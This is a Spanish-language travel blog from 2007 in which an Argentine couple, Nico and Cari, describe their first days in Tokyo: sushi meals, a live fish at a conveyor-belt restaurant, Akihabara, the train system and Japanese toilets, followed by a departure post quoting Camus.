Los japoneses, pese a lo que mundialmente se crea, son muy modernos y elegantes en su vestir. Al igual que en el cuidado meticuloso en la presentacion de su comida, el vestir japones es muy cuidado, lo cual, es acompanado de una gran oferta del mercado textil, que segun decidio el equipo, la pone en la posicion numero uno del ranking (Ni Madrid, ni NY).

Es interesante como los japoneses ponen toda su tecnologia para las distintas areas comerciales, como se puede ver por ejemplo, en la siguiente foto, donde la pantalla muestra en tiempo real como queda una persona son diferentes tipos de maquillaje - Por razones de salud mental, evitamos la fotografia de los miembros masculinos del grupo-.

Finalmente, se cumplio uno de los objetivos del equipo y se comprobo la famosa calidad real del sushi Japones. Los platos estuvieron compuesto por toda clase de Niguiris (Pescado crudo acompaniado de una bola de arroz en la parte inferior), Miso-shiru (Sopa de Miso con Hongos) y Te verde. Todo esto por la modica suma de 1500 yenes.
El dia continuo su curso, pero los heroes de esta historia se vieron abatidos por el jet-lag, por lo que precisaron un descanso de una hora -siesta, que solo tomo la miembro femenina del grupo- para luego continuar la expedicion por el famoso barrio de Akihabara.

No querido publico, no es un local de ropa sino el famoso barrio Electronico en los suburbios de Tokyo. Para llegar alli, el equipo tuvo que utilizar todas sus habilidad matematicas para decifrar el complejo mapa de subtes y trenes - Dice una vieja leyenda, que si se suma la cantidad de letras, se resta el numero de estaciones y se divide por 3.14, el resultado dado es 666, pero queda a merced del lector creen en la veracidad del mismo-.

Dejenme hacer un corte para detalles un poco como funcionan. Los trenes y subtes de tokyo, no tienen mucho de trenes, tampoco tienen mucho de subte. Es decir, los trenes van por arriba y por abajo de la tierra, y los subtes lo mismo. Se conectan entre ellos, pese a ser diferentes.
El equipo opto por tomar la linea de trenes Yamamoto Line perteneciente a la empresa JR con destino a la estacion Akihabara. El trecho tomo aproximadamente unos 30 minutos que por momentos se vivio con afixia por el exceso demografico en el interior del mismo.

Finalmente, se llego a destino. Es muy dificil realmente recorrer todo Akihabara, tiene callecitas y callejuelas, algunos locales traen a la memoria el Once profundo, pero con un poco mas de prolijidad quizas. Todo tipo de aparato electronico, cable, tuerca, herramienta, revistas de comic japonesa, musica, etc se encontraba en los distintos locales desperdigados, aunque realmente, en el poco tiempo que estuvimos poco fue lo que pudimos ver.

Simplemente nos dirigimos a Yodobashi Camera, un complejo de 8 pisos de un tamanio monstruoso - y sepan perdonar el adjetivo -, en donde cada piso correspondia a un tipo de articulo especifico (DVD/CD, Audio-Video, Camaras de Foto, etc). Si bien hay mucha variedad, en la masividad de los productos es dificil encontrar algo.
Por lo que el equipo salio un tanto frustrado no pudiendo conseguir aquello anhelado.

Cansados del recorrido, el equipo opto por una comida liviana, por lo que se dirigio al ultimo piso de Yodobashi en busca de pescado crudo, y lo encontro. La modalidad del local posiblemente tenga algun nombre especifico pero lo desconocemos, basicamente funciona de la siguiente manera: Tiene una cinta electronico -cual escalera mecanica- que gira por todo el local, uno se sienta en la barra y escoge el plato que quiera que suele contener dos niguiris del mismo tipo. Cada plato tiene un color distinto, y al final de la comida depende los colores de los platos es el dinero que paga.
Muy moderado, el equipo solo comio 7 platos. Nuestro vecino de silla, nos sobrepaso y el era uno solo.

El vecino de la derecha, pidio un plato del cual no pudimos obtener material fotografico, pero solo le podemos decir que se movia. Basicamente consistia por una bandeja con un platito chiquito que contenia sardinitas, y en la misma bandeja tenia un pescado de mediana altura que estaba atravesado por un palillo de brochet, el cual Cari alerto que habia abierto la boca, y despues de un tiempo de contemplarlo, se puedo observar que realmente, el pescado seguia vivo -Hasta donde el equipo sabe, el pescado no habia sido ingerido, pero era cuestion de tiempo hasta que ocurra, lo que obviamente se comprobo, era que realmente ese pescado era fresco-.

Finalmente, el equipo realizo un fugaz paso por el banio donde noto que el inodoro tenia un peculiar boton llamado "Flush Buttom" - En otra edicion, ampliaremos sobre los banios japoneses y sus increibles cualidades-. El "Flush Buttom", como se comprobo, sirve para que el inodoro haga ruido como de tirar la cadena para tapar cualquier ruido molesto que uno pueda realizar cuando se encuentra en ese incomodo momento en un banio publico.

Eso es todo por hoy, los dejo con algunas fotos del dia en la siguiente direccion: http://picasaweb.google.com/nicowow/Tokyo27112007

Los queremos!

Nico & Cari

Kore wa nan des ka?

2007-11-26T21:45:00.000-08:00

Hola!

Llegamos finalmente despues 30 arduas horas de aviones -10 a Washington, 6 horas de espera, 13 y monedas a Tokyo- sin saber ya como acomodarnos en el asiento. Pero henos aqui, 6.29 AM -Las 6.29PM hora Argentina-, en el mas profundo de nuestro insomnios -mentira, cari puede dormir y seguir durmiendo, nico no-.
Bueno basta de pavadas y vamos al grano. Nos encontramos en pleno centro de Tokyo, en la ciudad de Shibuya (famosa por el cruce de calles con carteles iluminados, que se puede apreciar en peliculas como "Lost in Translation") y es realmente muy lindo.
Gracias a nuestras grandes habilidades como entendidos de culturas exoticas, pudimos decifrar la forma de tomarnos el "Narita Express", tren bala, que nos trajo en 1 hora reloj hasta esta hermosa ciudad.
A la salida, ya en plena noche, las luces de las pantallas y el J-Pop -Una suerte de sonido electronico que recuerda las viejas epocas del Gameboy y el Family Game- nos iluminaron el camino hasta nuestros queridos aposentos.
A la noche, salimos en busca de nuestro real destino -La comida-. Luego de utilizar todo nuestro intelecto para entender cual de las miles de pequenas puertitas de restaurant servia sushi, terminamos en uno... que obviamente, no servia sushi.
Pero impulsados por esa extrana picazon que genera la curiosidad, nos quedamos. El mozo era de por mas, confianzudo, y pese a que se ponia muchisimo esfuerzo de las dos partes, fue casi imposible entablar conversacion -Una carta importante para jugar en las relaciones internacionales, es siempre nombrar al referente: Maradona, o, aunque no lo crean, Lionel Messi es la nueva incorporacion para ubicar geograficamente nuestro pais en el globo-.
El restaurant era muy chiquito y su especialidad era comida 'asada' -Si, los argentinos terminaron comiendo asado-, pero con la pecularidad, que te traian una pequena parrilita Zen con carbon en forma de hielo rolito, en la cual vos te cocinabas tu propia comida, y luego la sazonabas con salsa de soja, Pasta Miso -a.k.a. Pastita dulzona- y Wasabi -Rabanito picante-.
Nuestra eleccion para la parrilla, recomendada en parte por nuestro nuevo amigo-mozo, fue un pescado muy sabroso llamado Hakko, Unagi -un tipo de anguila, que venia pinchado en un palito de brochet 'yakitori'- y otro tipo de anguila -o el mismo, vaya uno a saber- llamado Anago -Que fue lo mas rico que probamos, una delicia-.
Para los retractores de la barba de nico, nuestro nuevo amigo-mozo, nos dijo que le quedaba bien.

Ya fuera del restaurant, dimos una vuelta por el barrio, nos pasemos por mutiples callejones y callecitas, nos enteramos de las ultimas tendencias en moda Japonesa -Shortcitos infimos a 10 grados de temperatura ambiente para la mujer, y cortes pelos salvajes para los hombres-.
Aqui llegamos al final de esta primera parte, el internet anda medio lento por que estamos colgados de un vecino -El hotel tiene internet, pero por cable. Crease o no, en el pais donde el inodoro calienta la tabla automaticamente, el internet es por cable de red-.

Los queremos mucho, y hasta pronto

Domo Arigato Gozaimasu,
Cari-San y Nico-San

Sobre el Exilio

2007-11-24T03:13:00.000-08:00

Buenos Aires,
Por 15 dias, partimos con Cari para Tokyo. Gambatte!

"El sufrimiento profundo que experimentaba era el de todos los prisioneros y el de todos los exiliados, el sufrimiento de vivir con un recuerdo inutil. Ese pasado mismo en el que pensaban continuamente solo tenia el sabor de la nostalgia. Hubieran querido poder anadirle todo lo que sentian no haber hecho cuando podian hacerlo, con aquel o aquella que esperaban, e igualmente mezclaban a tods las circunstancias relativamente dichosas de sus vidas de prisioneros la imagen del ausente, no pudiendo satisfacerse con lo que en la realidad vivian. Impacientados por el presente, enemigos del pasado y privados del porvenir, eramos semejantes a aquellos que la justicia o el odio de los hombres tienen entre rejas. Al fin, el unico medio de escapar a este insoportable vagar, era hacer marchar los trenes con la imaginacion y llenar las horas con las vibraciones de un timbre que, sin embargo, permanecia obstinadamente silencioso"

- Albert Camus, La Peste